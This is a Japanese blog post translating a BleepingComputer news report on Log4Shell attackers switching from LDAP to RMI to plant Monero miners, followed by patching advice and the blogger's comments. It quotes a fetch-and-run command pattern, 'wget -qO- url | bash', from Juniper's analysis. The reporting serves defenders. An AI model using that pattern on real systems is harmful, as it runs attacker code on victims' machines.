Log4j の攻撃手法が LDAP から RMI へ:現時点では Monero マイナーが使用

Log4j attackers switch to injecting Monero miners via RMI

2021/12/16 BleepingComputer — Apache Log4j の脆弱性を悪用する一部の脅威アクターたちは、LDAP コールバック URL から RMI への切り替えを図り、また、成功の可能性を最大限に高めるために、1つのリクエストで双方を使用しているようだ。この移行は、進行中の攻撃における顕著な変化であり、すべての潜在的な攻撃ベクターを、防御者が保護しようとする際に注意する必要が生じる。

今のところ、この傾向は、Monero の採掘のためにリソースをハイジャックしようとする脅威アクターから観察されたものだが、その他の脅威アクターも、このトレンドを採用することが考えられる。

LDAP から RMI へ

Log4j の脆弱性である Log4Shell を狙った多くの攻撃は、LDAP (Lightweight Directory Access Protocol) サービスを介して行われてきた。そして、RMI (Remote Method Invocation) API への切り替えは、このメカニズムが更なるチェックと制約を受けることを考えると、直感的には理屈に反するように思えるが、必ずしもそうではない。

JVM (Java Virtual Machine) のバージョンによっては、厳格なポリシーを備えていないものもあり、そのようなケースでは、RMI は LDAP よりも簡単な RCE (リモートコード実行) 達成の経路になり得る。さらに、LDAP リクエストは、現在では感染チェーンの一部として定着しているため、防御側がより厳しく監視するようになっている。たとえば、現時点では数多くの IDS/IPS ツールが、JNDI と LDAP によるリクエストをフィルタリングしている一方で、RMI を無視する可能性もある。

実際のところ、いくつかのケースにおいて Juniper は、同じ HTTP POST リクエスト内で RMI と LDAP の両サービスを確認している。しかし、Log4Shell の脆弱性を悪用しようとする全て脅威アクターにとっては、脆弱な Log4j サーバーで処理させる悪意の文字列を送信し、ターゲット上でのコード実行につながるという目的に変わりはない。この種の攻撃では、リモート・サーバーからシェルス・クリプトをダウンロードする、bash シェルが生成される。

Juniper Labs のレポートには、「あるコードは、JavaScript スクリプト・エンジンを介して、bash シェルコマンドを呼び出し、”$@|bash “という構文を使ってダウンロードしたスクリプトを実行する。そのコマンドの実行中に、この bash シェルは、攻撃者のコマンドを別の bash プロセスにパイプする。つまり、”wget -qO- url | bash” により、ターゲット・マシン上にシェル・スクリプトをダウンロードし、実行させる」と解説している。

リソースをハイジャックして金儲け

Juniper Labs が確認した攻撃では、脅威アクターは侵害したサーバーで、Monero を採掘することに関心を持ち、それは誰にも害を及ぼさない、ほとんど無害なアクティビティのように見える。この採掘者は、x84_64 Linux システムをターゲットとし、cron サブシステムを経由して永続性を追加する。

これまでのところ、ほとんどの攻撃は Linux システムを標的としているが、Check Point のアナリストによると、Log4Shell を悪用する最初の Win32 実行ファイルとして、StealthLoader と呼ばれるものが発見されたようだ。

発見/更新/報告

直近において、最も影響力のある欠陥の1つとなった、この脆弱性を防御する唯一の実現可能な方法は、Log4j のバージョンを 2.16.0 にアップすることだ。さらに、管理者は、Apache のセキュリティ・セクションで、その後の新バージョンの発表を注視し、すぐに適用していく必要がある。

緩和のためのガイダンスと、完全な技術情報リソースについては、CISA の Log4Shell に関する詳細ページを確認してほしい。そこには、CVE-2021-44228 の影響を受ける製品の広範なリストがあり、ベンダーが提供するアドバイザリを含むリストが、 GitHub リポジトリで常に更新されている。最後に、もし、自身のシステムで不審な動きに気づいたら、FBI や CISA に報告することも検討してほしい。

LDAP から RMI へと、攻撃ベクターが拡大しているようです。先日に「CISA の Log4j 対策:Log4Shell による被害の範囲と深刻さを把握したい」という記事をポストしましたが、そこには「CISA や民間のサイバー・セキュリティ調査機関は、いまのところ猛威を奮っていない潜在的な影響について、あり得ないほどの深刻な言葉を発している。しかし、そのような未知の可能性があるからこそ、企業に対してパッチを当てるなどのセキュリティ対策を講じるよう、CISA は呼びかけているのだ」と記されていました。つまり、何処で何が起こるのか、まったく分からないという状況なのでしょう。その意味で、RMI にもご注意ください。→ Log4j まとめページ

%d bloggers like this: